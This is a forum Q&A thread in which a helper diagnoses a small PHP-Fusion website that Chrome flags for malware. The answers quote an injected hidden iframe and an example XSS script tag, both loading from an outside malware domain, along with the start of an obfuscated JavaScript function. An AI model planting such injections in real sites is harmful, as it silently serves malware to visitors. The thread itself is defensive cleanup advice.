5

Some friends of mine have a website (www.kennelsoffie.dk) and I'm trying to help them when there is any trouble. However this time I, can't figure it out. When I visit the site using Google Chrome, I'm presented with a warning page claiming that the page that I'm trying to visit contains elements from stopssse.info.

I don't know any PHP, so I simply downloaded the complete website including backups of the database (which are .sql files). Then, I searched all the files for stopssse, but I didn't find anything.

I also tested the site with siteadvisor.com it says "We tested this site and didn't find any significant problems".

Can PHP hide a reference to the malware site so I cant find it with a simple search? If so, how can you find it?

CruelIO
  • 153
  • 1
  • 6

8 Answers8

5

I found this in the generated source

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

It was right below the body tag, it's not in the actual page source, it's being added by obfuscated javascript

edit: if you look at the bottom of http://www.kennelsoffie.dk/includes/jscript.js you'll see a really odd looking javascript function. That's the obfuscated javascript function I was telling you about. It starts with

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

Best bet is to find and remove it.

  • 2
    +1 Definitely the culpret want to remove it and also importantly find out how it got in there. – Mark Davidson Sep 01 '09 at 12:57
  • 2
    Yes good point, I imagine that because it's powered by php fusion that there is some security hole in the product itself, it's worth checking whether your version is up to date, you may also be able to replace all the files with the exception of the main configuration file without losing any content. –  Sep 01 '09 at 13:07
  • Thank you very much. That did the trick. How did you did you see the generated source? If i right clic in the browser and picked show source I didnt that part of the code. – CruelIO Sep 01 '09 at 14:56
  • 1
    Web Developer toolbar in firefox allows you to see the generated source code. – Mark Davidson Sep 01 '09 at 16:00
  • 1
    Firebug is also quite useful for that –  Sep 02 '09 at 09:47
2

Your are most probably dealing with XSS attacks.

In that case, two steps :

  • Scan the DB, looking for "scripts" tags, and get rid of them.
  • Hire a guy who knows PHP to fix the holes in your data input and set some efficient sanitizing policy.
e-satis
  • 409
  • 5
  • 17
1

The malware might not be on the site, but might be coming from material brought in from external sources, such as advertisements.

Thomas Owens
  • 201
  • 1
  • 10
1

If the site was "infected" via cross-site scripting, then what you have is probably a user-submitted comment somewhere that contains something like this:

<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>

But note that there are many variations that attempt to hide the fact that an external script is executed, and which may also modify the source URL, causing your simple string search to fail.

1

The version of PHP-Fusion that's running on the site appears to be v6.01.3, which looks to be a pretty old version, so it would probably be a good idea to upgrade that.

There seems to have been quite a few security advisories for PHP-Fusion, including a number of SQL injections issues.

Full list of advisories for PHP-Fusion here: http://secunia.com/advisories/product/5291/?task=advisories

Vex
  • 111
  • 2
0

Look for any peculiar files in the actual directories. There may be a file that was uploaded via an unsecure upload-form that writes additional data to the output. Tell your friend to change his account information, and start reviewing the security of his site.

Sampson
  • 520
  • 2
  • 6
  • 18
0

It's there, check the PHP files (search for stopssse).

Alix Axel
  • 2,653
  • 6
  • 28
  • 28
0

In the general case, looking for obfuscated javascrot, this tool is often useful: Wepawet

Tom Newton
  • 4,021
  • 2
  • 23
  • 28